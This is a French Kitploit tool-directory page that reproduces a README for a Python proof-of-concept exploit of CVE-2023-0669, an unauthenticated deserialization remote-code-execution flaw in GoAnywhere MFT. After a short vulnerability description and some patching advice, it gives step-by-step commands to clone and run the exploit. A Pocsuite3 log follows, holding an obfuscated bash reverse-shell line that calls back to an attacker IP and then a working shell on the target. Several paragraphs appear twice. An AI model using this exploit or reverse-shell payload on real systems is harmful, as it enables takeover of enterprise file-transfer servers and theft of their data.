Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Désérialisation Vulnérabilités Python RCE Preuve de concept | Kitploit
Outils/GitHubGitHub/avento/cve-2023-0669
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Désérialisation Vulnérabilités Python RCE Preuve de concept

Voir le dépôt
83il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-0669 Désérialisation GoAnywhere MFT - Blog de Je Yiuwai

CVE-2023-0669

CVE-2023-0669 est une vulnérabilité de désérialisation dans GoAnywhere MFT. En raison de la désérialisation d'un objet contrôlé par un attaquant, il existe une vulnérabilité d'injection de commande pré-authentifiée dans le Servlet de réponse de licence. Un attaquant peut exploiter cette vulnérabilité pour exécuter du code arbitraire sur le système affecté, entraînant une prise de contrôle complète du système. La vulnérabilité affecte les versions antérieures à 7.1.2, à l'exclusion de 7.1.2.

CVE-2023-0669 est une vulnérabilité de désérialisation dans GoAnywhere MFT qui existe dans le Servlet de réponse de licence en raison d'une vulnérabilité d'injection de commande pré-authentifiée qui permet à un attaquant d'exécuter du code arbitraire sur le système affecté en désérialisant un objet contrôlé par l'attaquant. La vulnérabilité affecte les versions antérieures à 7.1.2.

Cette vulnérabilité peut constituer une menace sérieuse pour la sécurité du logiciel de transfert de fichiers d'entreprise GoAnywhere MFT. Les attaquants peuvent l'exploiter pour voler des données sensibles, falsifier des données, compromettre le système, etc. Par conséquent, les utilisateurs doivent prendre des mesures rapidement pour protéger le système.

La vulnérabilité constitue une menace sérieuse pour la sécurité du logiciel de transfert de fichiers d'entreprise GoAnywhere MFT, car les attaquants peuvent l'exploiter pour voler des données sensibles, falsifier des données et compromettre les systèmes. Par conséquent, les utilisateurs doivent prendre des mesures rapidement pour protéger leurs systèmes.

Un avis de sécurité officiel a été publié et des méthodes d'inspection préliminaires ont été fournies. Les utilisateurs peuvent vérifier si leur système est affecté par cette vulnérabilité en recherchant des chaînes spécifiques dans le journal userdata/logs. Si des correctifs ne peuvent pas être appliqués, il est recommandé de prendre d'autres mesures de sécurité pour protéger le système.

L'avis de sécurité officiel a été publié et des méthodes d'inspection préliminaires ont été fournies. Les utilisateurs peuvent vérifier si leurs systèmes sont affectés par la vulnérabilité en recherchant des chaînes spécifiques dans le journal userdata/logs. Si les correctifs ne peuvent pas être appliqués, il est recommandé de prendre d'autres mesures de sécurité pour protéger le système.

En résumé, CVE-2023-0669 est une vulnérabilité de désérialisation nécessitant l'attention des utilisateurs. Les utilisateurs doivent mettre à jour vers la dernière version rapidement et vérifier si leur système est affecté par cette vulnérabilité. De plus, il est recommandé aux utilisateurs de renforcer la gestion de la sécurité des logiciels d'entreprise tels que GoAnywhere MFT et de prendre des mesures de sécurité multicouches pour protéger leurs systèmes.

En résumé, CVE-2023-0669 est une vulnérabilité de désérialisation qui nécessite l'attention des utilisateurs. Les utilisateurs doivent mettre à jour vers la dernière version rapidement et vérifier si leurs systèmes sont affectés par la vulnérabilité. De plus, il est recommandé que les utilisateurs renforcent la gestion de la sécurité des logiciels d'entreprise tels que GoAnywhere MFT et prennent des mesures de sécurité multicouches pour protéger leurs systèmes.

CVE-2023-0669 PoC

Introduction

Cet Exploit est un script Python utilisé pour exploiter la vulnérabilité CVE-2023-0669 dans GoAnywhere MFT v6.7.9594 et versions antérieures.

Introduction

Cet Exploit est un script Python utilisé pour exploiter la vulnérabilité CVE-2023-0669 dans GoAnywhere MFT v6.7.9594 et versions antérieures.

Description de la vulnérabilité

Cette vulnérabilité existe en raison d'un problème de sécurité dans le traitement des requêtes Bundle chiffrées dans GoAnywhere MFT. Un attaquant peut envoyer une requête spécialement conçue pour exécuter du code arbitraire sur le serveur cible.

Description de la vulnérabilité

Cette vulnérabilité existe en raison d'un problème de sécurité dans le traitement des requêtes Bundle chiffrées dans GoAnywhere MFT. Un attaquant peut envoyer une requête spécialement conçue pour exécuter du code arbitraire sur le serveur cible.

Utilisation

  1. Clonez ce dépôt.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Entrez dans le répertoire.
root@kitploit:~
cd CVE-2023-0669
  1. Installez les dépendances requests et cryptography.
root@kitploit:~
pip install requests cryptography
  1. Exécutez l'exploit.
root@kitploit:~
python CVE-2023-0669.py --host <IP cible>

Utilisation

  1. Clonez ce dépôt.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Entrez dans le répertoire.
root@kitploit:~
cd CVE-2023-0669
  1. Installez les dépendances requests et cryptography.
root@kitploit:~
pip install requests cryptography
  1. Exécutez l'exploit.
root@kitploit:~
python CVE-2023-0669.py --host <IP cible>

Remarques

  • L'exécution de cet Exploit nécessite des droits d'accès légitimes et ne doit pas être utilisée à des fins illégales.
  • Étant donné que l'exécution de cet Exploit présente un risque pour le serveur cible, l'utilisateur est seul responsable des risques et des conséquences.

Note

  • L'exécution de cet Exploit nécessite des droits d'accès légitimes et ne doit pas être utilisée à des fins illégales.
  • Étant donné que l'exécution de cet Exploit présente un risque pour le serveur cible, l'utilisateur est seul responsable des risques et des conséquences.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                          nom-poc                             |     id-poc    |   composant    |         version          |  statut |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet Désérialisation | CVE-2023-0669 | GoAnywhere MFT | avant 7.1.2, excluant 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Auteur : Je Yiuwai édité par xiaomi pad 6 pro

Télécharger l’outil